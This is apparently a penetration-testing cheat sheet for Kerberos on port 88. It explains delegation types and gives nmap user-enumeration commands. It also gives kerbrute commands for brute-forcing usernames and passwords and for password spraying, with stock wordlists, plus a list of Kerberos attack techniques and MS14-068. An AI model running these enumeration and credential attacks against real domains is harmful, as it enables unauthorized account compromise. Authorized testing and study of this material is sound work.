Kerberos – port 88

Kerberos is an authentication protocol that works on the basis of tickets to allow nodes to prove their identity to one another in a secure manner. Its designers aimed it primarily at a client–server model, and it provides mutual authentication – both the user and the server verify each other’s identity.

Kerberos is based on tickets that expire in time. Pre-authentication scheme is based on “long term” key (key based on users’ password). Kerberos supports certificates (PKINIT) for pre-authentication.

Nmap scripts
Bruteforce
Exploits

Kerberos Delegation

  • [KUD] Unconstrained: account can delegate to any service, delegation set on the account, requires domain admin privileges (SetEnableDelegationPrivilege in the domain)
  • [KCD] Constrained: account can delegate to a set of services, delegation set on the account, requires domain admin privileges (SetEnableDelegationPrivilege in the domain)
    • With protocol transition (“Use any auth. protocol”)
    • Without protocol transition (“Kerberos only”)
  • [RBCD] Resource-Based Constrained: a set of services can delegate to the account, delegation set on the account, does NOT require ultra high privileges, machine can configure itself for RBCD

Nmap scripts

IP=x.x.x.x
ls -la /usr/share/nmap/scripts/krb*

User enumeration

Official Documentation

The Kerberos Realm is often the domain in uppercase! Try all these username lists 😉

USERS=/usr/share/seclists/Usernames/top-usernames-shortlist.txt
#USERS=/usr/share/seclists/Usernames/Names/names.txt
#USERS=/usr/share/seclists/Usernames/cirt-default-usernames.txt
REALM=EXAMPLE.COM
nmap -p 88 --script krb5-enum-users --script-args krb5-enum-users.realm=${REALM} $IP

Really fast!

nmap -p 88 --script krb5-enum-users --script-args krb5-enum-users.realm=${REALM},userdb=${USERS} $IP

Bruteforce

Official Documentation (GitHub)

Install kerbrute

sudo pip3 install kerbrute

Help

kerbrute -h

Bruteforce usernames

USE NMAP SCRIPT INSTEAD, WAY FASTER!

IP=x.x.x.x
DOMAIN=example.com
USERS=/usr/share/seclists/Usernames/Names/names.txt
#USERS=/usr/share/seclists/Usernames/top-usernames-shortlist.txt
#USERS=/usr/share/seclists/Usernames/cirt-default-usernames.txt
kerbrute -dc-ip $IP -domain $DOMAIN -users $USERS -password "12345" -outputusers kerbrute-users-${IP}.txt

Bruteforce passwords

IP=x.x.x.x
USER=myprecious
USERS=users.txt
DOMAIN=example.com
WL=/usr/share/seclists/Passwords/Common-Credentials/best1050.txt
#WL=/usr/share/wordlists/rockyou.txt
kerbrute -dc-ip $IP -domain $DOMAIN -user $USER -passwords $WL -outputfile kerbrute-${IP}.txt
kerbrute -dc-ip $IP -domain $DOMAIN -users $USERS -passwords $WL -outputfile kerbrute-${IP}.txt

Password Spray

kerbrute -dc-ip $IP -domain $DOMAIN -users $USERS -password $PASS -outputfile kerbrute-spray-${IP}.txt
kerbrute -d $DOMAIN passwordspray $USERS 'Password123'

Exploits

Ideas (The Hacker Recipes): Pre-auth bruteforce, Pass the key, Pass the ticket, Pass the cache, Pass the certificate, Overpass the hash, UnPAC the hash, Forged tickets (Golden ticket, Silver tickets, Diamond tickets, Sapphire tickets, RODC Golden tickets), ASREQroast, ASREProasting, Kerberoast, Delegations (e.g. S4U abuse), Shadow credentials, sAMAccountName spoofing, SPN-jacking

AS-REP Roasting

See AS-REP Roasting.

Kerberoasting

See Kerberoasting.

Overpass the Hash/Pass the Key

See Overpass the Hash/Pass the Key.

MS14-068 – Privilege Escalation

In November 2014, Microsoft released a patch (MS14-068) to rectify an exploitable vulnerability in Windows implementation of the Kerberos Key Distribution Center (KDC). The vulnerability purportedly allows users to “elevate” (and abuse) their privileges, up to Domain level.